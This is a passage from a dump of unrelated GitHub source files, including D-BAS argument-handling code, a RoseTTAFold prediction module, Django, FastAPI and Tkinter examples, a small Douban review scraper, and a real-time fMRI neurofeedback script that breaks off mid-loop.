list to create the link to a possible reference\n if __is_conclusion_in_premisegroups(premisegroups, db_conclusion):\n return {\n 'argument_uids': new_argument_uids,\n 'statement_uids': new_statement_uids,\n 'error': _tn.get(_.premiseAndConclusionAreEqual)\n }\n\n for premisegroup in premisegroups: # premise groups is a list of lists\n new_argument, statement_uids = __create_argument_by_raw_input(db_user, premisegroup, db_conclusion, supportive,\n db_issue)\n\n new_argument_uids.append(new_argument.uid)\n new_statement_uids.append(statement_uids)\n\n error = None\n if len(new_argument_uids) == 0:\n a = _tn.get(_.notInsertedErrorBecauseEmpty)\n b = _tn.get(_.minLength)\n c = environ.get('MIN_LENGTH_OF_STATEMENT', 10)\n error = '{} ({}: {})'.format(a, b, c)\n\n return {\n 
'argument_uids': new_argument_uids,\n 'statement_uids': new_statement_uids,\n 'error': error\n }\n\n\ndef __set_url_of_start_premises(prepared_dict: dict, db_conclusion: Statement, supportive: bool, db_issue: Issue,\n db_user: User, history, mailer):\n logger('StatementsHelper', '__receive_urls_of_start_premises')\n\n # arguments=0: empty input\n # arguments=1: deliver new url\n # arguments>1: deliver url where the user has to choose between her inputs\n _um = UrlManager(db_issue.slug, history)\n _main_um = UrlManager(db_issue.slug, history=history)\n new_argument_uids = prepared_dict['argument_uids']\n\n if len(new_argument_uids) == 1:\n url = _um.get_url_for_new_argument(new_argument_uids)\n\n else:\n pgroups = [DBDiscussionSession.query(Argument).get(arg_uid).premisegroup_uid for arg_uid in new_argument_uids]\n url = _um.get_url_for_choosing_premisegroup(False, supportive, db_conclusion.uid, pgroups)\n\n # send notifications and mails\n email_url = _main_um.get_url_for_justifying_statement(db_conclusion.uid, Attitudes.AGREE if supportive else Attitudes.DISAGREE)\n nh.send_add_text_notification(email_url, db_conclusion.uid, db_user, mailer)\n\n prepared_dict['url'] = url\n\n\ndef insert_new_premises_for_argument(premisegroup: List[str], current_attack, arg_uid, db_issue: Issue, db_user: User):\n \"\"\"\n Creates premises for a given argument\n\n :param premisegroup: List of strings\n :param current_attack: String\n :param arg_uid: Argument.uid\n :param db_issue: Issue\n :param db_user: User\n :return: Argument\n \"\"\"\n logger('StatementsHelper', 'def {}'.format(arg_uid))\n\n statements = []\n for premise in premisegroup:\n statement = insert_as_statement(premise, db_user, db_issue)\n statements.append(statement)\n\n # set the new statements as premise group and get current user as well as current argument\n new_pgroup = set_statements_as_new_premisegroup(statements, db_user, db_issue)\n current_argument = DBDiscussionSession.query(Argument).get(arg_uid)\n\n new_argument = None\n if current_attack == Relations.UNDERMINE:\n new_argument = set_new_undermine_or_support_for_pgroup(new_pgroup.uid, current_argument, False, db_user,\n db_issue)\n\n elif current_attack == Relations.SUPPORT:\n new_argument, duplicate = set_new_support(new_pgroup.uid, current_argument, db_user, db_issue)\n\n elif current_attack == Relations.UNDERCUT:\n new_argument, duplicate = set_new_undercut(new_pgroup.uid, current_argument, db_user, db_issue)\n\n elif current_attack == Relations.REBUT:\n new_argument, duplicate = set_new_rebut(new_pgroup.uid, current_argument, db_user, db_issue)\n\n if not new_argument:\n logger('StatementsHelper', 'No statement or any premise = conclusion')\n return Translator(db_issue.lang).get(_.premiseAndConclusionAreEqual)\n\n logger('StatementsHelper', 'Returning argument ' + str(new_argument.uid))\n return new_argument\n\n\ndef set_statements_as_new_premisegroup(statements: List[Statement], db_user: User, db_issue: Issue):\n \"\"\"\n Set the given statements together as new premise group\n\n :param statements: [Statement]\n :param db_user: User\n :param db_issue: Issue\n :return: PremiseGroup.uid\n \"\"\"\n logger('StatementsHelper', 'user: ' + str(db_user.uid) +\n ', statement: ' + str([s.uid for s in statements]) + ', issue: ' + str(db_issue.uid))\n # check for duplicate\n all_groups = []\n for statement in statements:\n # get the premise\n db_premise = DBDiscussionSession.query(Premise).filter_by(statement_uid=statement.uid).first()\n if db_premise:\n # getting all groups, where the 
premise is member\n db_premisegroup = DBDiscussionSession.query(Premise).filter_by(\n premisegroup_uid=db_premise.premisegroup_uid).all()\n groups = set()\n for group in db_premisegroup:\n groups.add(group.premisegroup_uid)\n all_groups.append(groups)\n # if every set in this array has one common member, they are all in the same group\n if len(all_groups) > 0:\n intersec = set.intersection(*all_groups)\n for group in intersec:\n db_premise = DBDiscussionSession.query(Premise).filter_by(premisegroup_uid=group).all()\n if len(db_premise) == len(statements):\n return DBDiscussionSession.query(PremiseGroup).get(group)\n\n premise_group = PremiseGroup(author=db_user.uid)\n DBDiscussionSession.add(premise_group)\n DBDiscussionSession.flush()\n\n premise_list = []\n for statement in statements:\n premise = Premise(premisesgroup=premise_group.uid, statement=statement.uid, is_negated=False,\n author=db_user.uid, issue=db_issue.uid)\n premise_list.append(premise)\n\n DBDiscussionSession.add_all(premise_list)\n DBDiscussionSession.flush()\n\n db_premisegroup = DBDiscussionSession.query(PremiseGroup).filter_by(author_uid=db_user.uid).order_by(\n PremiseGroup.uid.desc()).first()\n\n return db_premisegroup\n\n\ndef __create_argument_by_raw_input(db_user: User, premisegroup: [str], db_conclusion: Statement, is_supportive,\n db_issue: Issue) \\\n -> Tuple[Union[Argument, None], List[int]]:\n \"\"\"\n Consumes the input to create a new argument\n\n :param db_user: User\n :param premisegroup: String\n :param db_conclusion: Statement\n :param is_supportive: Boolean\n :param db_issue: Issue\n :return:\n \"\"\"\n logger('StatementsHelper',\n 'main with premisegroup {} as premisegroup, conclusion {} in issue {}'.format(premisegroup,\n db_conclusion.uid,\n db_issue.uid))\n\n new_statements = []\n\n for text in premisegroup:\n statement = insert_as_statement(text, db_user, db_issue)\n new_statements.append(statement)\n\n # second, set the new statements as premisegroup\n new_premisegroup = set_statements_as_new_premisegroup(new_statements, db_user, db_issue)\n logger('StatementsHelper', 'new pgroup ' + str(new_premisegroup.uid))\n\n # third, insert the argument\n new_argument = __create_argument_by_uids(db_user, new_premisegroup.uid, db_conclusion.uid, None, is_supportive,\n db_issue)\n transaction.commit()\n\n if new_argument:\n _tn = Translator(db_issue.lang)\n _um = UrlManager(db_issue.slug)\n append_action_to_issue_rss(db_issue=db_issue, db_author=db_user, title=_tn.get(_.argumentAdded),\n description='...' 
+ get_text_for_argument_uid(new_argument.uid,\n anonymous_style=True) + '...',\n url=_um.get_url_for_justifying_statement(new_argument.uid, Attitudes.DONT_KNOW))\n\n return new_argument, [s.uid for s in new_statements]\n\n\ndef __create_argument_by_uids(db_user: User, premisegroup_uid, conclusion_uid, argument_uid, is_supportive,\n db_issue: Issue) -> Union[Argument, None]:\n \"\"\"\n Connects the given id's to a new argument\n\n :param db_user: User.nickname\n :param premisegroup_uid: PremiseGroup.uid\n :param conclusion_uid: Statement.uid\n :param argument_uid: Argument.uid\n :param is_supportive: Boolean\n :param db_issue: Issue\n :return:\n \"\"\"\n logger('StatementsHelper', 'main with user: ' + str(db_user.nickname) +\n ', premisegroup_uid: ' + str(premisegroup_uid) +\n ', conclusion_uid: ' + str(conclusion_uid) +\n ', argument_uid: ' + str(argument_uid) +\n ', is_supportive: ' + str(is_supportive) +\n ', issue: ' + str(db_issue.uid))\n\n new_argument = DBDiscussionSession.query(Argument).filter(Argument.premisegroup_uid == premisegroup_uid,\n Argument.is_supportive == is_supportive,\n Argument.conclusion_uid == conclusion_uid,\n Argument.issue_uid == db_issue.uid).first()\n if not new_argument:\n new_argument = Argument(premisegroup=premisegroup_uid, is_supportive=is_supportive, author=db_user.uid,\n issue=db_issue.uid, conclusion=conclusion_uid)\n new_argument.set_conclusions_argument(argument_uid)\n\n DBDiscussionSession.add(new_argument)\n DBDiscussionSession.flush()\n\n # TODO This should be redundant code! new_argument should be the new argument\n new_argument = DBDiscussionSession.query(Argument).filter(Argument.premisegroup_uid == premisegroup_uid,\n Argument.is_supportive == is_supportive,\n Argument.author_uid == db_user.uid,\n Argument.conclusion_uid == conclusion_uid,\n Argument.argument_uid == argument_uid,\n Argument.issue_uid == db_issue.uid).first()\n transaction.commit()\n if new_argument:\n logger('StatementsHelper', 'argument was inserted')\n return new_argument\n else:\n logger('StatementsHelper', 'argument was not inserted')\n return None\n","repo_name":"wahello/mirror","sub_path":"dbas/handler/statements.py","file_name":"statements.py","file_ext":"py","file_size_in_byte":23183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6929276763","text":"# -*- coding:utf-8 -*-\nfrom proto.pb.hello_pb2 import HelloMessage\n\n\ndef test_hello_message():\n hello = HelloMessage(title=\"title\", content=\"this is content\")\n print(hello)\n\n print(\"===\" * 10)\n data = hello.SerializeToString()\n print(data)\n\n hello2 = HelloMessage()\n hello2.ParseFromString(data)\n print(hello2)\n\n\nif __name__ == \"__main__\":\n test_hello_message()\n","repo_name":"codelieche/microservice.py","sub_path":"grpcdemo/demo/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21203299242","text":"import numpy as np\nimport os\nfrom os.path import isfile, join\nimport tensorflow as tf\ntf.logging.set_verbosity(tf.logging.ERROR)\nimport time\nfrom .resnet import *\nfrom .model import *\nfrom .deepLearningUtils import *\n\n# Loads in files for one prediction\ndef getData(tmp, outfolder, distogram):\n data = np.load(tmp)\n \n # 3D information\n idx = data[\"idx\"]\n val = data[\"val\"]\n \n # 1D information\n angles = np.stack([np.sin(data[\"phi\"]), np.cos(data[\"phi\"]), np.sin(data[\"psi\"]), np.cos(data[\"psi\"])], axis=-1)\n obt = 
data[\"obt\"].T\n prop = data[\"prop\"].T\n \n # 2D information\n orientations = np.stack([data[\"omega6d\"], data[\"theta6d\"], data[\"phi6d\"]], axis=-1)\n orientations = np.concatenate([np.sin(orientations), np.cos(orientations)], axis=-1)\n maps = data[\"maps\"]\n tbt = data[\"tbt\"].T\n sep = seqsep(tbt.shape[0])\n \n # Transformation\n tbt[:,:,0] = transfomer(tbt[:,:,0])\n maps = transfomer(maps)\n\n return (idx, val),\\\n np.concatenate([angles, obt, prop], axis=-1),\\\n np.concatenate([tbt, maps, orientations, sep, distogram], axis=-1)\n \n# Sequence separtion features\ndef seqsep(psize, normalizer=100, axis=-1):\n ret = np.ones((psize, psize))\n for i in range(psize):\n for j in range(psize):\n ret[i,j] = abs(i-j)*1.0/100-1.0\n return np.expand_dims(ret, axis)\n\ndef transfomer(X, cutoff=6, scaling=3.0):\n X_prime = np.maximum(X, np.zeros_like(X) + cutoff) - cutoff\n return np.arcsinh(X_prime)/scaling\n\ndef getDistribution(outfolder):\n path = outfolder\n tbts = [np.load(path+\"/\"+f)[\"tbt\"][0,:,:] for f in os.listdir(path) if isfile(join(path,f)) and \".features.npz\" in f]\n for i in range(len(tbts)-1):\n if not tbts[i].shape == tbts[i+1].shape:\n print(\"All pdbs in the input folder need to have the same size.\")\n tbt = np.array(tbts)\n transformed = transfomer(tbt, cutoff=6, scaling=1.0)\n digitization = np.arange(0.25,5.1,0.25)\n binned = np.eye(len(digitization)+1)[np.digitize(transformed, digitization)]\n normalized = np.sum(binned, axis=0)/tbt.shape[0]\n np.save(join(outfolder, \"dist.npy\"), normalized)\n \ndef predict(samples, distogram, modelpath, outfolder, verbose=False, transpose=False):\n n_models = 2 \n for i in range(1, n_models):\n modelname = modelpath+\"_rep\"+str(i)\n if verbose: print(\"Loading\", modelname)\n \n model = Model(obt_size=70,\n tbt_size=58,\n prot_size=None,\n num_chunks=5,\n optimizer=\"adam\",\n mask_weight=0.33,\n lddt_weight=10.0,\n name=modelname,\n verbose=False)\n model.load()\n \n for j in range(len(samples)):\n if verbose: print(\"Predicting for\", samples[j], \"(network rep\"+str(i)+\")\") \n tmp = join(outfolder, samples[j]+\".features.npz\")\n batch = getData(tmp, outfolder, distogram)\n lddt, estogram, mask = model.predict2(batch)\n if transpose:\n estogram = (estogram + np.transpose(estogram, [1,0,2]))/2\n mask = (mask + mask.T)/2\n np.savez_compressed(join(outfolder, samples[j]+\".npz\"),\n lddt = lddt,\n estogram = estogram,\n mask = mask)\n \ndef merge(samples, outfolder, verbose=False):\n for j in range(len(samples)):\n if verbose: print(\"Merging\", samples[j])\n\n lddt = []\n estogram = []\n mask = []\n for i in range(1,5):\n temp = np.load(join(outfolder, samples[j]+\".rep\"+str(i)+\".npz\"))\n lddt.append(temp[\"lddt\"])\n estogram.append(temp[\"estogram\"])\n mask.append(temp[\"mask\"])\n\n # Averaging\n lddt = np.mean(lddt, axis=0)\n estogram = np.mean(estogram, axis=0)\n mask = np.mean(mask, axis=0)\n\n # Saving\n np.savez_compressed(join(outfolder, samples[j]+\".npz\"),\n lddt = lddt,\n estogram = estogram,\n mask = mask)\n \ndef clean(samples, outfolder, verbose=False):\n for i in range(len(samples)):\n if verbose: print(\"Removing\", join(outfolder, samples[i]+\".features.npz\"))\n os.remove(join(outfolder, samples[i]+\".features.npz\"))\n","repo_name":"RosettaCommons/RoseTTAFold","sub_path":"DAN-msa/pyErrorPred/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":1838,"dataset":"github-code","pt":"40"} 
+{"seq_id":"32743832179","text":"\r\n\r\n# Write a program which accept one number form user and return addition of its factors.\r\n\r\ndef Factors(x):\r\n for i in range(1, x+1):\r\n if x % i == 0:\r\n print(i)\r\n\r\nx = int(input(\"Enter the number : \")) \r\n#print(Factors(x))\r\n\r\nFactors(x)","repo_name":"renukas99/Python_Assignments","sub_path":"Assignment2/Assignment2_4.py","file_name":"Assignment2_4.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19994507236","text":"from decimal import Decimal\n\nfrom rest_framework.response import Response\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom django_redis import get_redis_connection\n\nfrom goods.models import SKU\n\nfrom .serializers import OrderSettlementSerializer, CommitOrderSerializer\n\n\nclass CommitOrderView(CreateAPIView):\n \"\"\"商品生成订单\"\"\"\n permission_classes = [IsAuthenticated]\n serializer_class = CommitOrderSerializer\n\n\nclass OrderSettlementView(APIView):\n \"\"\"订单结算\"\"\"\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n user = request.user\n redis_conn = get_redis_connection('cart')\n redis_cart = redis_conn.hgetall('cart_%d' % user.id)\n cart_selected = redis_conn.smembers('selected_%d' % user.id)\n cart = {}\n for sku_id in cart_selected:\n cart[int(sku_id)] = int(redis_cart[sku_id]) # {'商品ID','商品数量'}\n skus = SKU.objects.filter(id__in=cart.keys())\n for sku in skus:\n sku.count = cart[sku.id]\n freight = Decimal('10.00')\n serializer = OrderSettlementSerializer({'freight': freight, 'skus': skus})\n return Response(serializer.data)\n","repo_name":"YiZhang-You/meiduo","sub_path":"meiduo_mall/meiduo_mall/apps/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1487842696","text":"#parsing\nlines = []\nfor line in sys.stdin:\n\tlines.append(line.rstrip('\\n'))\nl, L = map(int, lines[0].split())\ngrid = []\nfor i in range(l):\n grid.append(lines[i + 1])\nsumkept = 0\ncoordskept = \"\"\n#on parcourt tout le paysage\nfor i in range(l-2):\n for j in range(L-2):\n sum=0\n\t\t#on calcul le score pour chaque photo 3 par 3\n for a in range(3):\n for b in range(3):\n if grid[i+a][j+b]==\"X\":\n sum+=1\n\t\t#si le score est maximal, on le garde en mémoire\n if sum >= sumkept:\n sumkept = sum\n coordskept = str(i + 1)+\" \"+ str(j + 1)\n \n#On affiche les coordonnées pour lesquelles on avait le score maximal\nprint(coordskept)\n","repo_name":"INSAlgo/INSAlgo-2021-2022","sub_path":"Séance 04 - 02 nov - Retours CodingBattle/CB2021-Solution-3.py","file_name":"CB2021-Solution-3.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"fr","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"72407646840","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\n 说明:本文件的目的是将训练数据的标签,按照与X相同的扩展方式\n 进行对应扩展.\n 结果:将promote之后的训练数据写出到文件中\n\n'''\n\nimport pandas as pd\n\n#**************************************************************读入数据************************************************************#\nindex = ['unit','cycle','feature_in','feature_de','feature_mix']\nindex2 = ['RUL']\nindex3 = ['unit','cycle'] \nnew_features_3_train = 
pd.read_table('new_features_3_train.txt',delim_whitespace=True,header=None,names=index,encoding='utf-8')\ntrain_y_FD001 = pd.read_table('train_y_FD001.txt',delim_whitespace=True,header=None,names=index2,encoding='utf-8') \nunit_cycle = new_features_3_train.loc[:,index3]\n\ntrain_y = pd.concat([unit_cycle,train_y_FD001],axis=1)\ntrain_y_copy = train_y.copy() # work on a copy of the original data and insert the new rows into it,\n # so the original data is not modified while we insert.\n\n\n#***********************************************************Define the function that computes y********************************************************#\ndef compute_y(x,k):\n if x>k:\n return int(x-k)\n else:\n print(\"the cycle number is less than k !\")\n\n\n#***********************************************************Perform the promote operation********************************************************#\n\nlast_row = len(train_y) - 1 # index of the last row (numbering starts at 0)\nlast_unit = int(train_y.loc[last_row,'unit']) # number of the last unit \nfinal_result = []\nfor unit in range(1,last_unit+1):\n slice_by_unit = train_y[train_y.unit==unit] # slice out all rows of the current unit\n result_temp = train_y_copy[train_y_copy.unit==unit] # slice the current unit's rows from the copy, ready for insertion\n k = int(slice_by_unit.cycle.quantile(0.75,interpolation='higher')) # 3/4 quantile of the current unit's cycle values\n spin = k # position variable used as a pointer to the split boundary of the copy \n promote_temp = slice_by_unit[slice_by_unit.cycle>k] # all rows beyond the 3/4 quantile \n for line in range(len(promote_temp)):\n promote_cycle = promote_temp.iloc[[line]] \n cycle_temp = int(promote_cycle.cycle) \n y = compute_y(cycle_temp,k) \n inset_temp = [promote_cycle]*y\n inset_temp = pd.concat(inset_temp,axis=0) \n above = result_temp.loc[:spin] \n below = result_temp.loc[spin+1:] \n result_temp = pd.concat([above,inset_temp,below],ignore_index=True)\n spin = spin + y + 1 \n final_result.append(result_temp)\n #print(final_result) \n\nfinal_result = pd.concat(final_result) \n\n\n#**************************************************************Write out to file********************************************************#\nfinal_result.to_csv('extended_RUL_with_unit_cycle_ID_FD001.txt',index=False,header=False,sep=' ')\n\n\n\n\n","repo_name":"ChampionZP/engine_RUL","sub_path":"projects/engine/standard1/extend_RUL_the_same_as_train_X.py","file_name":"extend_RUL_the_same_as_train_X.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"74751764280","text":"from tkinter import *\r\n\r\nbtnList=[\"\"]*9\r\nfnameList= [\"eclair.gif\", \"froyo.gif\", \"gingerbread.gif\", \"honeycomb.gif\", \"icecream.gif\", \"jellybean.gif\", \"kitkat.gif\", \"lollipop.gif\", \"marshmallow.gif\"]\r\nphotoList=[None]*9\r\ni,k=0,0\r\nxPos, yPos=0,0\r\nnum=0\r\n\r\n# main window\r\nwindow=Tk()\r\nwindow.geometry(\"210x210\")\r\n\r\nfor i in range(0,9):\r\n photoList[i]=PhotoImage(file=\"E:/Python/GIF/\"+fnameList[i])\r\n btnList[i]=Button(window, image=photoList[i])\r\n\r\nfor i in range(0,3):\r\n for k in range(0,3):\r\n btnList[num].place(x=xPos,y=yPos)\r\n num+=1\r\n xPos +=70\r\n # reset\r\n xPos =0\r\n yPos +=70\r\n\r\nwindow.mainloop()\r\n","repo_name":"m-veloper/soldesk-python","sub_path":"gui/gui08.py","file_name":"gui08.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30910175003","text":"# The regular number of working hours per month\r\nREGULAR_HOURS = 100\r\n# The overtime rate for extra hours worked\r\nOVERTIME_RATE = 2\r\n\r\ndef main():\r\n \"\"\"Main function that prompts user for input and calls 
calculate_salary\"\"\"\r\n # Get employee's name, number of hours worked, and hourly rate from user input\r\n name = input(\"Enter employee's name: \").strip().title()\r\n num_hours = input(\"Enter the number of hours worked per month: \")\r\n rate = input(\"Enter your hourly rate: \")\r\n print('-'*20)\r\n # Call calculate_salary function and print the result\r\n print(calculate_salary(name, num_hours, rate))\r\n\r\n\r\ndef calculate_salary(name, num_hours, rate):\r\n \"\"\"Function that calculates the employee's monthly salary\"\"\"\r\n try:\r\n # Convert num_hours and rate to float\r\n num_hours = float(num_hours)\r\n rate = float(rate)\r\n except ValueError:\r\n # Return an error message if num_hours or rate is not a number\r\n return \"Error: Please enter numeric values for hours worked and hourly rate.\"\r\n\r\n # Calculate salary based on regular hours and overtime hours worked\r\n if num_hours > REGULAR_HOURS:\r\n over_hours = num_hours - REGULAR_HOURS\r\n salary = (REGULAR_HOURS * rate) + (over_hours * rate * OVERTIME_RATE)\r\n else:\r\n salary = num_hours * rate\r\n\r\n # Return the employee's name, number of hours worked, and monthly salary\r\n return f\"{name} has worked {num_hours} hours this month. His salary is {salary:,.2f}$\"\r\n\r\nmain()","repo_name":"mattar740/Problem-Solving","sub_path":"Python for Beginner/Setion 8 Python Conditionals & Lists/1 expressions statements project/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"30916827373","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import FileResponse, JSONResponse\nfrom fastapi.openapi.docs import get_swagger_ui_html\nfrom core.util.constants import (\n API_TITLE,\n API_DESCRIPTION,\n API_VERSION,\n API_LICENSE_NAME,\n CONTACT_NAME,\n CONTACT_EMAIL,\n GITHUB_TOS_URL,\n GITHUB_LICENSE_URL,\n FAVICON_PATH,\n FAVICON_URL,\n OPEN_API_URL,\n NAME,\n URL,\n EMAIL\n)\nfrom v1.api import router as v1_router\n\n\n# Initialize FastAPI\napi = FastAPI(\n title=API_TITLE,\n description=API_DESCRIPTION,\n version=API_VERSION,\n terms_of_service=GITHUB_TOS_URL,\n contact={\n NAME: CONTACT_NAME,\n EMAIL: CONTACT_EMAIL,\n },\n license_info={\n NAME: API_LICENSE_NAME,\n URL: GITHUB_LICENSE_URL,\n }\n)\n\n# Add middleware\napi.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"GET\"],\n)\n\n# Add Routers\napi.include_router(v1_router)\n\n\n# Swagger UI HTML\n@api.get(\"/\", include_in_schema=False)\nasync def swagger_ui_html():\n return get_swagger_ui_html(\n title=API_TITLE,\n openapi_url=OPEN_API_URL,\n swagger_favicon_url=FAVICON_URL\n )\n\n\n# Health\n@api.get(path=\"/health\", name=\"Health\", tags=[\"default\"], response_class=JSONResponse, status_code=200)\nasync def health() -> dict:\n \"\"\"\n Check the health of the API.\n \"\"\"\n return {}\n\n\n# Favicon\n@api.get(path='/favicon.ico', name=\"Favicon\", tags=[\"default\"], response_class=FileResponse, include_in_schema=False)\nasync def favicon():\n \"\"\"\n Get the favicon for the API.\n \"\"\"\n return FileResponse(FAVICON_PATH)\n","repo_name":"MoritzHayden/drg-api","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"69840469241","text":"# -*- coding: utf-8 
-*-\n\"\"\"\nminiCrawler:\n\n在豆瓣任意找一本图书,抓取它某一页的短评并进行页面解析将短评文字抽取后输出,再对其中的评分进行抽取计算其总分。\n\n【bookid换成自己选择的书名id】\n\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nsum = 0\nr = requests.get('https://book.douban.com/subject/bookid/comments/')\nsoup = BeautifulSoup(r.text, 'lxml')\npattern = soup.find_all('p', 'comment-content')\nfor item in pattern:\n print(item.string)\npattern_s = re.compile('', connectionstyle='arc3,rad=0')) \n\n\nyellow_circle = mlines.Line2D([], [], color='yellow', linestyle='None', \n marker='o',markeredgecolor='black', markeredgewidth=0.5,\n markersize=15, label='Base stimuli')\nred_star = mlines.Line2D([], [], color='red',linestyle='None', marker='*',\n markeredgecolor='black', markeredgewidth=0.5,\n markersize=15, label='Current stimulus')\n\nplt.legend(handles=[yellow_circle, red_star],\n loc='upper center', bbox_to_anchor=(0.5, -0.05),ncol=4)\n\n\n\n\n#%%############################################################################\n# Reading data from TBV #\n###############################################################################\ntimepoint_timing = []\n\n\n#USEFUl FOR OTHER SCANNERS AND SIMULATIONS\nwhile '5' not in event.getKeys(['5']):\n print('Waiting scanner....')\n\n\n# serFmri = serial.Serial('COM1', 57600)\n# prevState = serFmri.getDSR()\n\n# while serFmri.getDSR() == prevState:\n# print('Waiting scanner....')\n \n\nglobalClock.reset() \nprint(\"First trigger!\")\n\n\n#it waits until the first time point is processed by TBV to be sure to \n#read correct data from TBV settings file\nCurrTimePoint = 0\nwhile TBV.get_current_time_point()[0] < 1:\n NrOfTimePoints = TBV.get_expected_nr_of_time_points()[0]\n NrOfROIs = TBV.get_nr_of_rois()[0]\n print('Waiting TBV....')\n\nraw_nf_coords = []\n\nprint(\"OK let's go! 
Expected TPs: \" + str(NrOfTimePoints)) \n#general loop\nwhile TBV.get_current_time_point()[0] <= NrOfTimePoints:\n \n if CurrTimePoint != TBV.get_current_time_point()[0]:\n timepoint_timing.append([CurrTimePoint ,globalClock.getTime()])\n #update current timepoint\n CurrTimePoint = TBV.get_current_time_point()[0]\n print('Current time point:',str(CurrTimePoint))\n \n \n #looking for a ROI\n if NrOfROIs == 0: \n print('Please add a ROI')\n NrOfROIs = TBV.get_nr_of_rois()[0]\n \n \n else:\n \n if not raw_nf_coords:\n raw_nf_coords = TBV.get_all_coords_of_voxels_of_roi(0)[0]\n \n nf_coords = rtRSAObj.match_coords(raw_nf_coords)\n #needed to avoid accessing to timepoint -1 (fake) or timepoint 0\n if CurrTimePoint > 1 :\n #THE ACTUAL EXPERIMENT STARTS ONLY IF THERE IS A ROI!!!!!!#\n\n #coordinates of voxels of the VOI (index = 0)\n # raw_nf_coords = TBV.get_all_coords_of_voxels_of_roi(0)[0]\n \n # nf_coords = rtRSAObj.match_coords(raw_nf_coords)\n \n #setting the fixation for the baseline\n if CurrTimePoint in baselines[1:,0]:\n fixation.draw()\n win.flip()\n \n #showing only the frame for the imaginative task\n elif CurrTimePoint in tasks[:,0]:\n print('stimulus')\n stimulus.play()\n fixation.draw()\n win.flip()\n \n elif CurrTimePoint in tasks[:,1]:\n stop_stim.play()\n print('stop')\n \n #extract the map and plot the current position\n elif CurrTimePoint in feedbacks[:,0]:\n\n #extractiing tvalues from the ROI\n #in this experimental paradigm we have only one contrast\n tvalues = [TBV.get_map_value_of_voxel(0,coords)[0] \n for coords in nf_coords]\n\n #estimate nwe stimulus coordinates\n stimulus_positions[idx_ctr,:] = rtRSAObj.target_positioning(tvalues)\n \n \n #plotting the new coordinates\n if idx_ctr == 0:\n print('Contrast:',idx_ctr+1)\n plt.scatter(stimulus_positions[idx_ctr,0],\n stimulus_positions[idx_ctr,1], \n marker = '*',s=200, color = 'red', \n edgecolors='black')\n ax.set_facecolor('dimgray')\n plt.xticks([])\n plt.yticks([])\n plt.axis('off')\n else:\n print('Contrast:',idx_ctr)\n plt.scatter(stimulus_positions[:idx_ctr,0],stimulus_positions[:idx_ctr,1], \n marker = '*',s=200, color = 'darkgray')\n plt.scatter(stimulus_positions[idx_ctr,0],stimulus_positions[idx_ctr,1], \n marker = '*',s=200, color = 'red', edgecolors='black')\n #plotting the trajectory\n plt.plot(stimulus_positions[:idx_ctr+1,0],stimulus_positions[:idx_ctr+1,1], '-',\n color = 'green')\n ax.set_facecolor('dimgray')\n plt.xticks([])\n plt.yticks([])\n plt.axis('off')\n \n #save figure\n plt.savefig(os.path.join(outdir,'tvals_Trial' + str(idx_ctr)+ '.png'),\n facecolor='dimgray', edgecolor='none', dpi=300)\n #show the figure()\n image.setImage(os.path.join(outdir,'tvals_Trial' + str(idx_ctr)+ '.png'))\n image.draw()\n win.flip()\n core.wait(fb_duration)\n \n #increment the index of the contrast map\n idx_ctr += 1\n \n elif CurrTimePoint == NrOfTimePoints:\n print('Last time point!')\n #contrast number is fixed for the simulation\n #extract tvalues at the corresponding coordinates\n tvalues = [TBV.get_map_value_of_voxel(0,coords)[0] \n for coords in nf_coords]\n \n #estimate new stimulus coordinates\n stimulus_positions[idx_ctr,:] = rtRSAObj.target_positioning(tvalues)\n \n #plotting the new coordinates\n print('Contrast:',idx_ctr+1)\n plt.scatter(stimulus_positions[:idx_ctr,0],stimulus_positions[:idx_ctr,1], \n marker = '*',s=200, color = 'darkgray')\n for label, x, y in zip(range(idx_ctr),stimulus_positions[:idx_ctr,0],stimulus_positions[:idx_ctr,1]):\n plt.annotate(label,xy=(x, y), xytext=(-5, 5))\n 
